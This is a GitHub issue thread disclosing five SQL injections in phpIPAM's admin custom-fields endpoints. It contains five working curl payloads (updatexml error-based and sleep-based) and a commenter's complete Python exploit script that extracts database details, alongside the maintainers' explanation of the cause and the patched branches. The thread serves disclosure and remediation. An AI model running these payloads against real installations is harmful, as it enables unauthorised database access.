New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Five sql injections on All Phpipam Versions. #2738
Comments
|
Hi @2ndGeorge
I think these issues have the same root cause. PDO->quote() isn't behaving as documented and escaping special characters in table names (at least on the machines I've tested), using bound parameters doesn't work for table names. I may just whitelist table names in queries and drop PDO->quote() completely to be safe. Non-trivial issue and fix.... may take a few days. |
|
Hello @2ndGeorge |
|
@GaryAllan the changes you've made remediate it in the exploit code I have put together. As this is in the docker versions of the application, the patches were easy to test. #!/usr/bin/env python3
# Exploit Title: phpIPAM Custom Field Filter SQL Injection
# Exploit Announcement Date: September 16, 2019 5:18 AM
# Exploit Creation Date: September 27, 2019
# Vendor Homepage: https://phpipam.net
# Software Link: https://github.com/phpipam/phpipam/archive/1.4.tar.gz
# Version: 1.4
# Tested on: Ubuntu 18.04 / MariaDB 10.4
# Requires:
# Python 3
# requests package
# For more details, view:
# https://github.com/phpipam/phpipam/issues/2738
# Example Output
# [+] Executing select user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select system_user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select @@version
# [*] Received: .4.8-MariaDB-1:10.4.8+maria~b
# [+] Executing select @@datadir
# [*] Received: /var/lib/mysq
# [+] Executing select @@hostname
# [*] Received: ubuntu
from requests import Session
host = "localhost"
login_url = f"http://{host}/app/login/login_check.php"
exploit_url = f"http://{host}/app/admin/custom-fields/filter-result.php"
credentials = {
"ipamusername": "Admin",
"ipampassword": "Password",
}
payload = {
"action": "add",
"table": "",
}
cmds = {
"unpriv": [
"select user()",
"select system_user()",
"select @@version",
"select @@datadir",
"select @@hostname",
]
}
if __name__ == "__main__":
client = Session()
resp = client.post(login_url, data=credentials)
if resp.status_code == 200:
for cmd in cmds["unpriv"]:
print(f"[+] Executing {cmd}")
payload["table"] = f"users`where 1=(updatexml(1,concat(0x3a,({cmd})),1))#`"
resp = client.post(exploit_url, data=payload)
info = resp.text.lstrip("<div class='alert alert-danger'>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':").rstrip("'</div><div class='alert alert-success'>Filter saved</div>")
print(f"[*] Received: {info}") |
|
Thanks |
|
Hi, I'm running 1.4. Is there a particular file I can download to remediate this or will I have to wait for the next release? Thanks |
|
Hello @peawet08 Fixes have been applied to the 1.3, 1.4 and master branches. To download the 1.4 git branch
or ` To update existing 1.4 branch |
Describe the bug
Five sql injections on All phpipam Versions.The vulnerable files are /app/admin/custom-fields/edit.php,/app/admin/custom-fields/edit-result.php,/app/admin/custom-fields/filter.php,/app/admin/custom-fields/filter-result.php,/app/admin/custom-fields/order.php
phpIPAM version
All phpipam Versions.
vulnerability 1
req:
curl 'http://testipam.com/app/admin/custom-fields/edit.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#`' --compressed --insecure
We can find user()
root@172.21.0.3info in response content.rsp:
vulnerability 2
req:
curl 'http://testipam.com/app/admin/custom-fields/edit-result.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`;select * from users where 1=sleep(10);#`&csrf_cookie=ylbgj5gvd5OFeTeVPMQVgCaD8zxMro1R&name=asdfadsf' --compressed --insecure
rsp:
The time of response is more than 10s.
vulnerability 3
req:
curl 'http://testipam.com/app/admin/custom-fields/filter.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#`' --compressed --insecure
rsp:
vulnerability 4
req:
curl 'http://testipam.com/app/admin/custom-fields/filter-result.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#`' --compressed --insecure
rsp
vulnerability 5
req:
curl 'http://testipam.com/app/admin/custom-fields/order.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`;select * from users where 1=sleep(10);#`¤t=1&next=3' --compressed --insecure
The text was updated successfully, but these errors were encountered: